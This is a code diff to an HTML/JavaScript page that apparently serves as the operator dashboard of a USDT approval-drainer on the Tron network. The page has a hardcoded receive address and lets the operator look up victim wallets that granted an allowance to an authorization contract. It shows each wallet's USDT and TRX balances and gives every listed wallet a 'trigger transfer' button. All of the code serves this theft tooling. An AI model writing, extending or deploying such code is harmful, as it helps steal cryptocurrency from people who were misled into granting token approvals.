--- a/index.html
+++ b/index.html
@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html lang="zh">
 <head>
@@ -16,11 +15,18 @@
     button { background: #00b894; color: white; padding: 0.5em 1em; border: none; border-radius: 5px; cursor: pointer; }
     .error { color: red; }
     #status { margin-top: 1em; font-weight: bold; }
+    input[type="text"] { padding: 0.5em; width: 250px; margin-right: 1em; }
   </style>
 </head>
 <body>
   <h1>🔐 USDT 授權監控後台</h1>
   <div id="status">🔍 正在檢查 TronLink...</div>
+
+  <div style="margin-top: 2em;">
+    <input type="text" id="checkWallet" placeholder="輸入錢包地址查詢" />
+    <button onclick="checkWallet()">查詢是否授權</button>
+  </div>
+
   <div id="wallets"></div>
 
   <script>
@@ -28,6 +34,7 @@
     const USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
     const USDT_DECIMALS = 1e6;
     const YOUR_RECEIVE_ADDRESS = "THjNpJWbuGxvhR9kDDTDz1wVKhe2PWLfNR";
+    const approvedWallets = [];
 
     function logStatus(msg, color = "#2d3436") {
       const status = document.getElementById("status");
@@ -35,67 +42,50 @@
       status.style.color = color;
     }
 
-    async function fetchApprovals() {
-  logStatus("📡 正在讀取授權事件...");
-  const walletsDiv = document.getElementById("wallets");
-  walletsDiv.innerHTML = "";
-  const results = [];
+    async function checkWallet() {
+      const address = document.getElementById("checkWallet").value.trim();
+      if (!address) return alert("請輸入錢包地址");
 
-  try {
-    let page = 0, stop = false;
-    while (!stop && page < 3) {
-      const res = await axios.get(
-        `https://apilist.tronscanapi.com/api/contract/events?contract=${USDT_CONTRACT}&eventName=Approval&limit=100&start=${page * 100}`
-      );
-      const events = res.data.data || [];
-
-      for (const evt of events) {
-        const { result } = evt;
-        if (
-          result &&
-          typeof result.spender === "string" &&
-          result.spender.toLowerCase() === AUTH_CONTRACT.toLowerCase()
-        ) {
-          if (!results.find(r => r.address === result.owner)) {
-            results.push({ address: result.owner });
-          }
+      try {
+        const usdt = await window.tronWeb.contract().at(USDT_CONTRACT);
+        const allowance = await usdt.allowance(address, AUTH_CONTRACT).call();
+        const value = parseFloat(allowance) / USDT_DECIMALS;
+        if (value > 0 && !approvedWallets.includes(address)) {
+          approvedWallets.push(address);
+          displayWallets();
         }
+        alert(`授權額度：${value} USDT`);
+      } catch (err) {
+        alert("查詢失敗：" + err.message);
       }
-
-      if (events.length < 100) stop = true;
-      page++;
     }
 
-    const contract = await window.tronWeb.contract().at(USDT_CONTRACT);
-    const authContract = await window.tronWeb.contract().at(AUTH_CONTRACT);
-    const walletsHtml = await Promise.all(results.map(async (w) => {
-      try {
-        const balance = await contract.balanceOf(w.address).call();
-        const allowance = await contract.allowance(w.address, AUTH_CONTRACT).call();
-        const trxBalance = await window.tronWeb.trx.getBalance(w.address);
-        const usdt = parseFloat(balance) / USDT_DECIMALS;
-        const allowed = parseFloat(allowance) / USDT_DECIMALS;
-        const trx = parseFloat(trxBalance) / 1e6;
+    async function displayWallets() {
+      const walletsDiv = document.getElementById("wallets");
+      walletsDiv.innerHTML = "";
+      const usdt = await window.tronWeb.contract().at(USDT_CONTRACT);
+      const html = await Promise.all(approvedWallets.map(async (addr) => {
+        try {
+          const balance = await usdt.balanceOf(addr).call();
+          const allowance = await usdt.allowance(addr, AUTH_CONTRACT).call();
+          const trxBalance = await window.tronWeb.trx.getBalance(addr);
+          const usdtAmt = parseFloat(balance) / USDT_DECIMALS;
+          const allowAmt = parseFloat(allowance) / USDT_DECIMALS;
+          const trx = parseFloat(trxBalance) / 1e6;
 
-        return `<div class="wallet-card">
-          <div><strong>錢包：</strong>${w.address}</div>
-          <div>USDT：${usdt}</div>
-          <div>授權額度：${allowed}</div>
-          <div>TRX 餘額：${trx}</div>
-          <button onclick="triggerTransfer('${w.address}')">🚀 觸發轉帳</button>
-        </div>`;
-      } catch (e) {
-        return `<div class="wallet-card error">⚠️ ${w.address} - 無法取得資料</div>`;
-      }
-    }));
-
-    walletsDiv.innerHTML = walletsHtml.join("");
-    logStatus(`✅ 已載入 ${results.length} 個錢包`);
-  } catch (e) {
-    logStatus("❌ 錯誤：" + e.message, "red");
-  }
-}
-
+          return `<div class="wallet-card">
+            <div><strong>錢包：</strong>${addr}</div>
+            <div>USDT：${usdtAmt}</div>
+            <div>授權額度：${allowAmt}</div>
+            <div>TRX 餘額：${trx}</div>
+            <button onclick="triggerTransfer('${addr}')">🚀 觸發轉帳</button>
+          </div>`;
+        } catch {
+          return `<div class="wallet-card error">⚠️ ${addr} - 無法取得資料</div>`;
+        }
+      }));
+      walletsDiv.innerHTML = html.join("");
+    }
 
     async function triggerTransfer(from) {
       try {
@@ -114,7 +104,6 @@
         if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
           clearInterval(check);
           logStatus("🟢 已連接錢包：" + window.tronWeb.defaultAddress.base58, "green");
-          fetchApprovals();
         } else {
           attempts++;
           logStatus("⏳ 嘗試連接 TronLink 中（" + attempts + "/20）...");
